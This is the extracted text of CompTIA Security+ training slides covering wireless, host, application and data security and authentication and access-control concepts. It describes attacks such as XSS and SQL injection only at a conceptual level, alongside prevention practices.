CompTIA Security+ Training
Securing Wireless Networks
• Temporal Key Integrity Protocol
• Wraps a 128-bit layer of encryption around WEP
• Uses a second key based on the MAC address of the machine and the serial number of the packet
• Mixes this additional key with the initialization vector for a per-packet key
• Is backward compatible with WEP
• Unfortunately TKIP is also quickly crackable
TKIP
CompTIA Security+ Training
Securing Wireless Networks
• Counter Mode with Cipher Block Chaining Message Authentication Code Protocol
• Used by WPA2
• 128-bit AES encryption
• 48-bit initialization vector
• Much reduced vulnerability to cracking and replay attacks
• Offers real confidentiality, authentication, and integrity
• Use WPA2 and CCMP!
CCMP
CompTIA Security+ Training
Securing Wireless Networks
• Wireless Application Protocol
• Used to provide mobile devices (phones, tablets) with internet connection
• Equivalent to TCP/IP for wireless devices
• Wireless Transport Layer Security (WTLS)
–Provides authentication, encryption, and data integrity
–Secures the communication between the WAP mobile device and the WAP server
–Similar to TLS
WAP
CompTIA Security+ Training
Securing Wireless Networks
• Extensible Authentication Protocol
• A set of authentication frameworks for wireless networks
• LEAP and PEAP are types of EAP
EAP, PEAP, and LEAP
Lightweight Extensible Authentication Protocol (LEAP)
• Created by Cisco – did not have Windows support • Requires mutual authentication • Easy to set up – no digital certificates • Weak
– Passwords only no digital certificates
–Vulnerable to dictionary attacks
–Cleartext transmissions
CompTIA Security+ Training
Securing Wireless Networks
Protected Extensible Authentication Protocol (PEAP)
• Replaces LEAP • Created by Cisco, Microsoft, and RSA together • One digital certificate is used on the authentication server • The authentication process is encrypted within a TLS tunnel
between the client and the server
• Extensible Authentication Protocol
• A set of authentication frameworks for wireless networks
• LEAP and PEAP are types of EAP
EAP, PEAP, and LEAP
Securing Wireless Routers and Access Points
Securing Wireless Routers and Access Points Best Practices
• Change the default admin account and password
• Change the SSID and turn off SSID broadcast
• Consider using MAC filtering
• Work with antenna placement and power level controls
• Configure the strongest encryption and authentication available
• Change keys and passwords often
• Keep your firmware patched and up-to-date
• Only use wireless when absolutely necessary and for users that absolutely need it
• Use additional layers of security like pre-authentication, IPSec tunneling, network separation, and host security
CompTIA Security+ Training
Securing Wireless Networks
• SSID
–Service Set Identifier
–Name of the wireless LAN
• Change the default SSID
–Something unique
–No identifiable information in the name
• Hide the SSID from being broadcast
–This keeps honest people honest
–Security through obscurity
–The SSID can still be sniffed
Change the SSID and Turn off SSID Broadcast
CompTIA Security+ Training
Securing Wireless Networks
• A list of MAC addresses for known trusted devices
–The 48-bit unique identifier for the network interface on a
physical device
• Only those on the list can connect to the network
• You can blacklist certain MAC addresses too
• Requires manual administration
–Need to update the list for new or guest devices
–Not recommended for larger environments
• MAC addresses can easily be spoofed
–Only use as one layer of protection
Consider Using MAC Filtering
CompTIA Security+ Training
Securing Wireless Networks
• Antenna Placement
–Not near outside walls or windows
–Not near other networks
– Find and avoid obstructions and interference
–Consider multiple access points on different channels
–Some antennas allow you to change the direction they point
• Power Level Controls
–Turn the power as low as possible while still covering your users
–Might need to play with this to get it perfect
Work with Antenna Placement and Power Level Controls
CompTIA Security+ Training
Securing Wireless Networks
Key Terms You Should Know
Term Definition
Wired Equivalent Privacy (WEP)
An weak protocol used for encryption on 802.11 WLANs
Wi-Fi Protected Access (WPA)
A weak wireless protocol that uses RC4 with TKIP
Wi-Fi Protected Access 2 (WPA2)
The 802.11i standard WPA2 is a more secure wireless protocol that uses AES encryption with CCMP
CompTIA Security+ Training
Securing Wireless Networks
Key Terms You Should Know
Term Definition
Temporal Key Integrity Protocol (TKIP)
An extra layer of encryption for WEP that uses a new keyspace for every packet
Counter Mode with Cipher Block Chaining Message
Authentication Code Protocol (CCMP)
Encryption and authentication used by WPA2 that provides confidentiality, authentication, and integrity
Wireless Application Protocol (WAP)
The protocol stack used by wireless devices. Security is done at the WTLS
CompTIA Security+ Training
Securing Wireless Networks
Key Terms You Should Know
Term Definition
Extensible Authentication Protocol (EAP)
A set of 5 authentication frameworks for wireless networks
Lightweight Extensible Authentication Protocol
(LEAP)
A easy to set up version of EAP that uses passwords for authentication
Protected Extensible Authentication Protocol
(PEAP)
A version of EAP that uses digital certificates
Service Set Identifier (SSID) The name of the wireless network
CompTIA Security+ Training
Securing Wireless Networks
What We Covered
WEP
WPA and WPA2
TKIP
CCMP
WAP
EAP, LEAP, and PEAP
Securing Wireless Routers and Access Points
• SSID Broadcast
• MAC Filter
• Antenna Placement and Power Level Controls
CompTIA Security+ Training Instructor: Lisa Szpunar
Host Security
CompTIA Security+ Training
Host Security
In This Lesson:
Securing Workstations
• Antimalware
• Host-based Firewalls
• Updates and Patch Management
• Disabling Unused Services
• Users and Accounts
• Virtualization
• Host Software Baselining
Securing Servers
Securing Mobile Devices
Exam Objectives: 4.2 Carry out appropriate procedures to establish host security
Securing Workstations
CompTIA Security+ Training
Host Security
• Antivirus and antispyware
–Software that is designed to identify, prevent, and remove/quarantine malicious code
–Antispyware is often included with antivirus
–Study and understand your tool’s licensing
• Methods
–Known virus/spyware signatures
–Behavior based
–Real time prevention that monitors all incoming files
– Full scans look for malware that has already been installed
Antimalware
CompTIA Security+ Training
Host Security
• Antivirus and antispyware
–Software that is designed to identify, prevent, and remove/quarantine malicious code
–Antispyware is often included with antivirus
–Study and understand your tool’s licensing
Antimalware
Antivirus and Antispyware Best Practices
• A trustworthy tool should be installed on every workstation
• Choose a tool that does real time monitoring
• Configure the software to automatically update
• Schedule full scans to run on a regular basis
• Educate your users on how to interact with prompts from your antimalware software
CompTIA Security+ Training
Host Security
• Antispam
–Determines if a message is likely to be spam and then labels, quarantines, or blocks it
• Blacklist
• Rule-based
• Bayesian
–Host-based
• Integrated with your email client
• Part of a complete antimalware package
–Not often a host-based solution
• Done by your email system, a third party service, or an appliance
Antimalware
CompTIA Security+ Training
Host Security
• Pop-up Blockers
–Block pop-up windows from appearing over or under you browser window
–Built into your browser
• Configure to be off for any work related website that use legitimate pop-ups
• Have the blocker turned on for every other website
–Configure pop-up blockers and other browser-based tools for every workstation
• Content inspection
• URL filtering
Antimalware
CompTIA Security+ Training
Host Security
• Filters all incoming traffic
• Should be on every workstation especially mobile computers
• There are free firewalls included with current operating systems
• Customized protection
–Applications installed
–Configurations
• Protects the workstation from other users on the same network
Host-based Firewalls
CompTIA Security+ Training
Host Security
Host-based Firewalls
Host-based Firewall Best Practices
•Keep it turned on and configured on every workstation
•Set the firewall to automatically update
•Configure according to the needs of the machine and its user
•Educate your users on how to interact with prompts from the firewall
•Remember to turn the firewall back on if you turned it off during troubleshooting
•Consider using with a host-based IDS system
CompTIA Security+ Training
Host Security
• Patches
–A quick fix that is not meant to be permanent
–A full update or new software version will fully fix the issue
• Hotfixes
– A bug fix or other change without
disrupting normal operation
• Service Packs/Support Packs
–A group of many different fixes
–Can add functionality
Consider update automation tools
Updates and Patch Management
Update Best Practices
• Configure the OS to update automatically
• Keep informed so you can install non-automatic updates
• Perform a backup before installing any updates
•Document updates performed
CompTIA Security+ Training
Host Security
Updates and Patch Management
Plan
Test
Install Audit
Document
CompTIA Security+ Training
Host Security
• Shrink the attack surface!
• Remove/Disable Unneeded
–Applications
–Programs
–Ports
–Services
• Do not permit users to install applications that are not needed for their job
Disabling Unused Services
CompTIA Security+ Training
Host Security
• User accounts
–Not also the workstation’s admin
–No registry access
–Remove unused local accounts
• Least privilege for users access to resources and data
• Strong policies
–Passwords
–Acceptable use
• Educate your users
Users and Accounts
CompTIA Security+ Training
Host Security
Virtualization
Hypervisor
Physical Networking Devices
Physical Host
Virtual Workstations/Servers
Hypervisor
CompTIA Security+ Training
Host Security
Virtualization
Hypervisor
Physical Networking Devices
Physical Host
Virtual Workstations/Servers
Hypervisor
Do provide the same security as you do for physical hosts
Single point of failure Single point of attack
CompTIA Security+ Training
Host Security
• A standardized minimal level of security that all hosts must comply with
–Services and applications installed / disabled
–Security updates applied
– Firewall and antimalware configured
• Document each system after it is hardened and meets
the baseline
• Frequently compare workstations to this documented baseline state to see if they still comply
–Use configuration automation tools
• Update your baseline when changes are made
Host Software Baselining
Securing Servers
CompTIA Security+ Training
Host Security
• Everything from the workstation security section
–Disable unused services, ports, and applications
–Have antimalware and a host based firewall
–Create and maintain security baselines
• Consider the server’s purpose when designing security
– Intrusion protection system
• Administrator accounts
–Have super strong passwords
–Are only known by people who need them
–Never log on with admin/service account when not doing administration tasks
Securing Servers
Securing Mobile Devices
CompTIA Security+ Training
Host Security
• Strong Passwords
–A thief with your device has unlimited time to try a brute force attack
–A long string of letters, numbers, special characters, and no real words
• Screen Lock
–When a device is inactive for a short time the screen times out and will not display again until a password is entered
Securing Mobile Devices
CompTIA Security+ Training
Host Security
• Device Encryption
–A stolen device is worthless to the thief if it is encrypted
–Not accessible without a password
–The stronger the encryption the more the performance is effected
–Choose a tool that meets your needs
• Which platforms
• Key management
• Cost
• Voice Encryption
–Encrypts the communications of mobile phones
–Will effect the performance and battery life of your device
Securing Mobile Devices
CompTIA Security+ Training
Host Security
• GPS Tracking
– If a device has GPS functionality (enabled) you can use it to find a lost device
–The device needs a GPS tracking app installed and configured
• Remote Wipe/Sanitation
–Offers the ability to erase the device if it has been lost or stolen
–A device with a remote wipe tool configured can be sanitized from a web browser or management console
–An added feature to messaging solutions
• Microsoft Exchange
• Google Apps for Business
Securing Mobile Devices
CompTIA Security+ Training
Host Security
• Mobile devices should be treated as an entrance point for malware and attacks
• Avoid mobile devices connecting to the LAN
–Any connections need to be filtered
• Educate users
–Vulnerabilities of mobile devices
–Keeping personal and company data separate
Securing Mobile Devices
CompTIA Security+ Training
Host Security
Key Terms You Should Know
Term Definition
Antimalware
Software that prevents, detects, quarantines, and removes malware from the system it is protecting. This includes antivirus, antispyware, and antispam software
Antivirus
A type of antimalware that prevents, detects, quarantines, and removes viruses, trojans and other malicious code from the system it is protecting
Antispyware
A type of antimalware that prevents, detects, quarantines, and removes spyware from the system it is protecting
CompTIA Security+ Training
Host Security
Key Terms You Should Know
Term Definition
Antispam Uses different methods to filter incoming messages and label, quarantine, or block those that appear to be spam
Baselining
Matching systems to a minimum standard of security actions and configurations and making sure those systems stay compliant
CompTIA Security+ Training
Host Security
What We Covered
Securing Workstations
• Antimalware
• Host-based Firewalls
• Updates and Patch Management
• Disabling Unused Services
• Users and Accounts
• Virtualization
• Host Software Baselining
Securing Servers
Securing Mobile Devices
CompTIA Security+ Training Instructor: Lisa Szpunar
Securing Applications
CompTIA Security+ Training
Securing Applications
In This Lesson:
Application Attacks and Vulnerabilities
Cookies
Session Hijacking
Header Manipulation
Cross-site Scripting
Cross-site Request Forgery
Injection Attacks
Buffer Overflow
Java Applets and JavaScript
ActiveX Controls
Malicious Add-ons
Attachments
Zero Day Exploits
CompTIA Security+ Training
Securing Applications
In This Lesson:
Exam Objectives:
3.5 Analyze and differentiate among types of application attacks
4.1 Explain the importance of application security
Application Security
Secure Coding Concepts
Fuzzing
Application Hardening
• Patch Management
• Configuration Baseline
Application Attacks and Vulnerabilities
CompTIA Security+ Training
Securing Applications
• Little text files that contain information about you
• Created by websites that you visit and stored locally your machine
• Used for
–Session IDs
–Browsing or shopping history
–Shopping cart contents
–Personal information or preferences
• A stolen cookie is stolen information
–A privacy concern
–A security issue
• Browser settings can disallow cookies from first or third-parties
• Browser add-ons can manage on a cookie-by-cookie basis
Cookies
CompTIA Security+ Training
Securing Applications
• A session token can be stolen (or guessed) and then replayed
–Often a cookie
• Used to carry out MitM and replay attacks
• A sniffer can capture session information
• Cross-site scripting can steal cookies
Session Hijacking
Session Hijacking Prevention
•Log out of all websites while not using them
•Do not allow persistent login cookies
•Encrypt sessions when possible
•Web server requires secondary authentication or re-authentication for performing critical functions
CompTIA Security+ Training
Securing Applications
• Changes values in HTTP headers
– In an HTTP request
– Force into as HTTP response
• Used to carry out other attacks and spoofs
–Cache-poisoning, cross-site request forgery, etc…
• There are tools available to easily manipulate headers
Header Manipulation
CompTIA Security+ Training
Securing Applications
• Exploits the trust a user has for a specific website
–The website must be vulnerable to XSS attacks
• Tricking a user into running a malicious script on their machine
–Victim must click on the attacker‟s URL or open the attacker‟s message
• Sends the victim to the XSS vulnerable site
• Runs a script on the victim„s browser
– The script runs at the permission level of the victim
–Malicious script steals session cookies or other information and sends it back to the attacker
Cross-site Scripting (XSS)
CompTIA Security+ Training
Securing Applications
• Reflected XSS (Non-persistent)
–URL for the attack is sent to the victim in an email or other message
–URL points to a trusted (XSS vulnerable) website but also contains the malicious code
• Stored XSS (Persistent)
–Malicious code is stored on the server and displayed on social networking or other website
–A greater number of victims will click on it
Cross-site Scripting (XSS)
CompTIA Security+ Training
Securing Applications
Cross-site Scripting (XSS)
Cross-site Scripting Prevention
•Client Side
–Disable script running
– Log out of all websites while not using them
– Do not use “remember me” or allow browsers to store login credentials
– Patch management of browsers and applications
– User Education – don‟t click links in emails
•Server Side
– Secure coding and testing of webpages
• Input sanitation
CompTIA Security+ Training
Securing Applications
• Exploits the trust that a website has for a user‟s browser
• Requests are sent to the web server from a trusted user that were not authorized by the user (victim)
• Victim must have an open session or unexpired cookie with the target website at the time of attack
• Attack is initiated when the victim clicks on or opens something from the attacker
–URL links in social networking or email
– Image tags
Cross-site Request Forgery (XSRF or CSRF)
CompTIA Security+ Training
Securing Applications
• Attacker targets forms or other actions on the website
–Must know exactly what info the website will ask for
• Attack may:
–Change email address and password to hijack the account
–Take screenshots of personal information
–Transfer money
Cross-site Request Forgery (XSRF or CSRF)
Cross-site Request Forgery Prevention
•Client Side
– Disallow social networking website access
– Log out of all websites while not using them
– Do not use “remember me” •Server Side
– Header checking
CompTIA Security+ Training
Securing Applications
Cross-site Scripting vs. Request Forgery
Sends a URL to the victim for that site with the malicious script inside
Clicks on the link to visit the site
A website that dynamically creates pages using unsanitized user input
The script runs stealing the victim's cookie
Finds a XSS vulnerable site
Echoes back the malicious script
CompTIA Security+ Training
Securing Applications
Cross-site Scripting vs. Request Forgery
Uses social engineering to get the victim to click on a link that contains the attack
Attack uses an unexpired session ID on the victim's computer to interact with the web server
The web server processes the forged request as usual
Social Networking
Site
Injection Attacks
Attack Type Also Called Description
SQL Injection SQL Insertion SQLi
Entering malicious text/commands either along with or instead of the expected user input to manipulate the database or return unauthorized information
LDAP Injection
Lightweight Directory Access Protocol Injection
Exploiting a week LDAP instance by entering unexpected user input that executes commands, returns unauthorized data, or modifies content
XML Injection
XPath Injection Using XPath to exploit XML vulnerabilities and return data that was not intended or expected by the data owner
Command Injection
Code injection
Inserting commands into an application through user input. Used in Directory Traversal and other attacks both to the server and client
When user-supplied data is used to dynamically create commands without validation and sanitation, injection attacks can occur.
CompTIA Security+ Training
Securing Applications
• Secure coding practices
–Proper type assignment for variables and parameters
– Input validation / filtering / sanitation
• Validate all user input to make sure it is exactly what is expected
• Filter out all commands, escape characters, null, and parameters of the wrong type
• Vulnerability scanning and fuzzing
• Patch management
Preventing Injection Attacks
CompTIA Security+ Training
Securing Applications
• More data is sent to an application that it can process or store in the buffer
– Junk data
–Malicious commands
• Results:
–Application crash
–Good data overwritten
–Executing code with
escalated privileges
–Changes in application behavior
Buffer Overflow
Buffer Overflow Attack
Prevention
•Patch management
•Vulnerability testing
•Secure coding practices and testing
CompTIA Security+ Training
Securing Applications
• Java Applets
–Run in a virtual machine/sandbox on the client
–Applets can get outside a flawed Java virtual machine (JVM)
–Only run Java Applets from tested and trusted websites and vendors
• JavaScript
–Executable and potentially dangerous
–Browsers do have built-in policies for what JavaScript is allowed to do
–Tools available to help control which JavaScripts are allowed
• Security Zones in Internet Explorer
• NoScript Firefox plug-in (advanced users)
Java Applets and JavaScript
CompTIA Security+ Training
Securing Applications
• Microsoft‟s version of applets
• Stored and run directly on the local machine – not in a sandbox
• Runs with the permission level of the logged in user
• Should be digitally signed (Authenticode)
–You know who the author is
–You know it has not been tampered with
–Do not allow unsigned ActiveX controls
• Even signed ActiveX have been known to have security holes
• Keep browser prompts on for ActiveX downloading and running in all IE Security Zones
• Educate your users about ActiveX browser prompts
ActiveX Controls
CompTIA Security+ Training
Securing Applications
• Browser add-ons can be a good thing
–Add functionality to your browser
• Many add-ons are not authored by the browser creator
–Anyone can download the SDK and create an add-on
• Browser creators do attempt to keep malware out of add-ons
• Research and test an add-on before using it your production environment
Malicious Add-ons
CompTIA Security+ Training
Securing Applications
• Security Zones
• Protected Mode
• InPrivate Browsing
• Tracking Protection
• ActiveX Filtering
• Cross-site Scripting Filter
Internet Explorer Security Settings Demonstration
CompTIA Security+ Training
Securing Applications
• Email attachments are a security threat
• A very common attack vector
• Could contain virus, worms, trojans, or other malware
• May be part of phishing or social engineering attacks
Attachments
Preventing Attacks
Through Attachments
•Do not allow script or executable attachments
•Consider disallowing all attachments
•User education – do not open attachments unless you were expecting that attachment from someone you know
•Run all attachments through an antivirus scanner
CompTIA Security+ Training
Securing Applications
• Attackers taking advantage of a new found vulnerability before the developer can release a patch
• Often happens before you realize it
• If known – turn off that application or service until a patched is released
• Your other layers of security can help mitigate these attacks
Zero Day Exploits
Application Security
CompTIA Security+ Training
Securing Applications
• Error and exception handling
–An exception is an error that the programmer did not foresee
–Explicitly program what should happen in all possible cases
• Including a catch-all general case
–Program in “human” error messages so that any compiler errors or codes are not displayed to the end-user
• Gives away too much information
• Input validation
–Ensure that all user-supplied input is exactly what is expected and all other characters are not allowed
Secure Coding Concepts
CompTIA Security+ Training
Securing Applications
• Technique of inputting unexpected values into applications to see what happens
–Random, invalid, unanticipated
• Results can be
–Client-side crash
–Server-side crash
–Unauthorized access to data
• Automated tools are available
• Can be an attack if done by an unauthorized person
• Utilize fuzzing in your environment before an attacker does
–Time consuming but worth it
Fuzzing
CompTIA Security+ Training
Securing Applications
• Keep up with application patch management
–Regularly research, test, install, audit, and document updates to the applications in your environment
• Updates may reset your configurations
–Hotfixes, patches, upgrades, new versions
–Application updates come from the application vendor
–Once a vulnerability is found attackers will exploit it
• Remove programs that are no longer used
• Restrict access to only the users that need each application for their job
Application Hardening
CompTIA Security+ Training
Securing Applications
• Have, maintain, and use application configuration baselines
– For performance and security
–The application‟s author and third-party authorities often offer best practice guidelines
–Use baselines when an application is deployed
• Creates consistency
– Frequently recheck for continued compliance
• Secure all your management consoles against unauthorized access
–Change default account
–Strong passwords
– Log out when not using
–Consider third-party or secondary authentication
Application Hardening
CompTIA Security+ Training
Securing Applications
Key Terms You Should Know
Term Definition
Cookies Little text files that are created by websites and stored by web browser that contain information about the user
Session Hijacking An unauthorized third-party stealing and using a session token and impersonating the rightful user
Header Manipulation Changing fields in the header to carry out various attacks
Cross-site Scripting Tricking users into running malicious scripts on their machine. Used to steal cookies and other info
Cross-site Request Forgery
Forged requests are sent to a web server from a trusted user that were not authorized by the user
CompTIA Security+ Training
Securing Applications
Key Terms You Should Know
Term Definition
SQL Injection Using unexpected user input that is not properly validated and sanitized to exploit SQL
LDAP Injection Using unexpected user input that is not properly validated and sanitized to exploit LDAP
XML Injection Using unexpected user input that is not properly validated and sanitized to exploit Xpath/XML
Command Injection Inserting commands into user input fields in order to exploit the application used to carry out directory traversal attacks
Directory Traversal The attacker is able to gain access directories outside of what is authorized. The attacker gets to the website‟s root or even worse the OS root directory
CompTIA Security+ Training
Securing Applications
Key Terms You Should Know
Term Definition
Buffer Overflow The application is given more data than it can process and store in the buffer. Leads to malicious code being written outside the designated buffer area
Malicious Add-ons Browser add-ons that include malicious code
Zero Day Exploits Attackers taking advantage of an exploit before a patch is released
CompTIA Security+ Training
Securing Applications
Key Terms You Should Know
Term Definition
Error and Exception Handling
A secure coding practice where all errors are accounted for and any exceptions will be handled gracefully with a “human” error message
Input Validation The practice of making sure user-supplied input is of exactly the type and length that is expected so no code or unexpected characters are accepted
Fuzzing The practice of entering in random or unexpected data into user input fields to find vulnerabilities and exceptions
CompTIA Security+ Training
Securing Applications
What We Covered
Application Attacks and Vulnerabilities
Cookies
Session Hijacking
Header Manipulation
Cross-site Scripting
Cross-site Request Forgery
Injection Attacks
Buffer Overflow
Java Applets and JavaScript
ActiveX Controls
Malicious Add-ons
Attachments
Zero Day Exploits
CompTIA Security+ Training
Securing Applications
What We Covered
Application Security
Secure Coding Concepts
Fuzzing
Application Hardening
• Patch Management
• Configuration Baseline
CompTIA Security+ Training Instructor: Lisa Szpunar
Data Security
CompTIA Security+ Training
Data Security
In This Lesson:
Data Loss Prevention (DLP)
Software-based Data Encryption
• Individual Files/Folders
• Full Disk/Whole Disk
• Database
• Removable Media
• Mobile Devices
Hardware-based Data Encryption
• Trusted Platform Module (TPM)
• Hardware Security Module (HSM)
• USB Encryption
• Hard Drive Encryption
Data Encryption Key Management
Data in the Cloud
Exam Objective:
4.3 Explain the
importance of data security
CompTIA Security+ Training
Data Security
• Making sure your data is available and not being accessed by unauthorized people or systems
– Internal or external breaches
• DLP systems monitor and report on data
• Best to monitor data in all locations
–At rest
– In transit/motion
– In use
• Examples
–Microsoft Forefront
–MyDLP
Data Loss Prevention (DLP)
DLP System Functions
Availability Not deleted or moved
Confidentiality Not sent in email or put on removable media
Access Control Watches for unauthorized access
Software-based Data Encryption
CompTIA Security+ Training
Data Security
Encrypting specific files/folders where they are stored or for confidentiality during transit
• End user controlled
• Encryption/decryption is done by the file system or application
• The file/folder stays encrypted if it is moved
• Often includes access control
Individual Files/Folders
CompTIA Security+ Training
Data Security
Encrypting specific files/folders where they are stored or for confidentiality during transit
• Examples:
–Windows Encryption File Standard (EFS)
–Microsoft Office
–Many third-party providers have moved to whole disk encryption
Individual Files/Folders
CompTIA Security+ Training
Data Security
Encrypting an entire physical hard disk or logical volume
• The entire volume is encrypted including the file system
• Can be transparent to the end user
• Data is only protected while it is on the encrypted drive
• Examples:
–Microsoft’s BitLocker
–Mac’s Disk Utility creates encrypted virtual disk images
–TrueCrypt
–Pretty Good Privacy (PGP)
Full Disk/Whole Disk
CompTIA Security+ Training
Data Security
Can be whole database-level encryption or encrypt only specific rows, columns, fields, cells, etc.
• Protects the data “at rest”
• Might be mandatory for regulatory compliance
• Is done either by the DB management system or by a separate encryption server
• Examples:
–Microsoft SQL Server’s Transparent Data Encryption (TDE)
Database
CompTIA Security+ Training
Data Security
Encrypting the data on removable media like CDs and DVDs and portable devices like USB drives, SD cards, and external hard drives
• Helps protect data if the device is lost or stolen
• Encryption software is often included on USB and removable hard drives
–User controlled
–Great for personal use
• A enterprise wide solution transfers control to administrators
–Often included with a full featured enterprise encryption solution
– Look for logging and auditing capabilities
–May include remote management
Removable Media
CompTIA Security+ Training
Data Security
Encrypting the data on digital phones, PDAs, and tablets
• Helps protect data if the device is lost or stolen
• Platform specific apps are available to encrypt and password protect mobile devices
• Enterprise solutions are available that work across platforms
• Remote wipe functionality is often included
Mobile Devices
Hardware-based Data Encryption
CompTIA Security+ Training
Data Security
• The TPM specification is a standard created by the Trusted Computing Group
• A built-in physical TPM chip stores keys, passwords, or certificates for encryption
• Includes a cryptographic processor
• Adds extra security to software-based encryption by storing keys on a separate hardware chip
• Used for disk encryption, password protection, software licensing enforcement, and configuration integrity checking
Trusted Platform Module (TPM)
CompTIA Security+ Training
Data Security
• Physical device (often a PCI adaptor)
• Used in larger environments
• Offloads cryptographic processes to save CPU resources
• Stores keys separate from the protected data
• Includes key management
–Often used by the certificate authority in public key infrastructure systems
Hardware Security Module (HSM)
CompTIA Security+ Training
Data Security
• Encryption that is done by a chip built in to the USB drive or external USB hard drive
–Whole device encryption for the data on the USB drive
• Also used as key/token for authentication or encryption of the device you plug the USB drive into
USB Encryption
CompTIA Security+ Training
Data Security
• Hardware-based encryption built into a hard drive
or
• A separate device that sits between the hard drive and motherboard
• Invisible to the user and operating system
• Separates the key from the data and operating system
Hard Drive Encryption
CompTIA Security+ Training
Data Security
• Where and how is the key stored
–At the same location as the data (less secure)
–On separate hardware
• Who has access to keys and passwords
–Attacks can happen from internal employees or contractors
–Your solution should support the ability to share encrypted files
• Strong password policies in use
• What happens if the key is lost
–Key backup
• Protect keys through their entire life-cycle
Encryption Key Management
CompTIA Security+ Training
Data Security
• Know what happens to your data when it leaves your network
–Software as a service
–Platform as a service
– Infrastructure as a service
• May effect regulatory compliance
• Encrypt data transfer with SSL/TLS or VPN
• Consider encrypting data before it leaves your network
Data in the Cloud
CompTIA Security+ Training
Data Security
Key Terms You Should Know
Term Definition
Encryption File Standard (EFS)
NTFS file system file/folder level encryption built into Windows operating systems
Trusted Platform Module (TPM)
A chip built into laptops and other devices that create and store keys for encryption
Hardware Security Module (HSM)
A hardware device that performs encryption and key management
CompTIA Security+ Training
Data Security
What We Covered
Data Loss Prevention (DLP)
Software-based Data Encryption
• Individual Files/Folders
• Full Disk/Whole Disk
• Database
• Removable Media
• Mobile Devices
Hardware-based Data Encryption
• Trusted Platform Module (TPM)
• Hardware Security Module (HSM)
• USB Encryption
• Hard Drive Encryption
Data Encryption Key Management
Data in the Cloud
CompTIA Security+ Training Instructor: Lisa Szpunar
Authentication, Authorization, and
Access Control
CompTIA Security+ Training
Authentication, Authorization, and Access Control
In This Lesson:
Authentication and Authorization
Identification vs. Authentication
Authentication and Authorization
Something You Know, Something You Have, and Something You Are
• Passwords
• Tokens
• Smart Cards
• Common Access Cards (CAC)
• Personal Identification Verification Cards (PIV)
• Biometrics
Single Factor vs. Multifactor Authentication
CompTIA Security+ Training
Authentication, Authorization, and Access Control
In This Lesson:
Access Control
Key Terms You Should Know
Types of Access Control
• Mandatory Access Control (MAC)
• Discretionary Access Control (DAC)
• Role-based Access Control (RBAC)
• Rule-based Access Control (RBAC)
Information Models
Exam Objectives:
5.2 Explain the fundamental concepts and best practices related to
authentication, authorization, and access control
Policies and Best Practices
Mandatory Vacations
Job Rotation
Separation of Duties
Trusted OS
Authentication and Authorization
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Identification
–The actual identity of the user is verified
–A human has confirmed that the person with the credentials is the owner of them
• Driver’s license
• Employee ID card
• Authentication
–User knows or has the authentication credentials
• Username, password
–That user should be but is not guaranteed to be the true owner of the credentials
–Even the credential owner’s real identity may be anonymous
Identification vs. Authentication
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Authorization
–Permitting or denying access
–Access control or authentication system defines what level of access a particular authenticated user has
–Subject to rules like time of day restrictions
• Allows access to only specific times and days
• Protects systems from attacks while no one is working
• A user must be authenticated before they can do/access what they are authorized
Authentication and Authorization
Something You Know, Something You Have, and Something You Are
Authentication by Knowledge (Type I)
• A string of characters entered from memory
–Passwords
–PIN number
–Pass codes
–Pass phrases
–Security questions
–Combinations
• Can be stolen, guessed, or cracked
• Have strong password policies
Something You Know
Something You Have
Something You Are
Something You Know, Something You Have, and Something You Are
Authentication by Ownership (Type II)
• Keys
–To open locked doors and cabinets
• Tokens
–Hold information about the user like access privileges
–Digital (session token)
• Issued by the system at authentication
• To be used for that session
–Physical Hardware (security token)
• Many forms:
– Keychain fob, USB dongle, scan card
• Often a one-time password generator
– SecureID
Something You Are
Something You Know
Something You Have
Something You Know, Something You Have, and Something You Are
Authentication by Ownership (Type II)
• Smart Cards
–A physical card
–Stores access permissions and other data
–Hard to duplicate but easy to steal
• Often blank, so if lost the finder doesn’t know who it belongs to or where to use it
• Used along with pin numbers
– Lock out happens if the incorrect pin is entered too many times
Something You Are
Something You Know
Something You Have
Something You Know, Something You Have, and Something You Are
Authentication by Ownership (Type II)
• Smart Cards
–A physical card
–Stores access permissions and other data
–Hard to duplicate but easy to steal
• Often blank, so if lost the finder doesn’t know who it belongs to or where to use it
• Used along with pin numbers
– Lock out happens if the incorrect pin is entered too many times
–Common Access Cards (CAC)
• US Department of Defense
• Identification and authorization
– Access to computers
– Signing email
– PKI
Something You Are
Something You Know
Something You Have
Something You Know, Something You Have, and Something You Are
Authentication by Ownership (Type II)
• Smart Cards
–A physical card
–Stores access permissions and other data
–Hard to duplicate but easy to steal
• Often blank, so if lost the finder doesn’t know who it belongs to or where to use it
• Used along with pin numbers
– Lock out happens if the incorrect pin is entered too many times
–Personal Identification Verification Cards
–Also called Personal Identity Verification Card (PIV)
– For U.S. government employees and contractors
–Physical access to government buildings
– Logical access to government information systems
Something You Are
Something You Know
Something You Have
Something You Know, Something You Have, and Something You Are
Authentication by Characteristic (Type III)
• Biometrics
–Use a unique biological trait as the authentication credential
• Fingerprint, handprint, retina scan, facial recognition
–Starting to include behavior traits as well as physical ones
–Can be built into laptops and other devices
–Can be used for physical access to buildings or rooms
–Concerns
• False positives and false negatives
• Inability to change your “password” if it is stolen
• Privacy issues
Something You Are
Something You Know
Something You Have
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Single Factor Authentication
–Only one set of authentication values are checked
–Example: Username and Password
• Multifactor Authentication
–More than one type of authentication happens
–Example: Username and Password + Smart Card scan
• Identity Proofing
–Answering an additional question
• When you forget your password
• When logging in from a new computer
Single Factor vs. Multifactor Authentication
Know
Know Have
Access Control
CompTIA Security+ Training
Authentication, Authorization, and Access Control
Key Terms You Should Know
• Permissions, Privileges, or Rights
–The level of access granted to users, groups, and roles
• Objects
– Files
– Folders
–Printers
–Applications
–Databases
• Subjects
–Users
–Processes
–Services
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Mandatory Access Control (MAC)
–Access is predefined and inflexible
–Controlled by administrators
–Users can’t choose to share objects themselves
–More secure but less flexible
–More overhead management that can fall into disrepair
Types of Access Control
MAC Example
Military Classifications
•Use of data labels like Secret or Top Secret
•Users have a clearance level and can only access data at that level
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Discretionary Access Control (DAC)
–Allows users to share objects with other users
–More flexible
– Less secure
Types of Access Control
DAC Example
Unix Permissions
•Users are in different groups Owner, group, or other
•The owner of an object sets the permission for each group Read, write, or execute
CompTIA Security+ Training
Authentication, Authorization, and Access Control
• Role-based Access Control (RBAC)
–Permissions are set based on roles
–A person/subject can be added to one or more role groups
–Simplifies administration
–When a person’s role changes so does his/her permissions
Types of Access Control
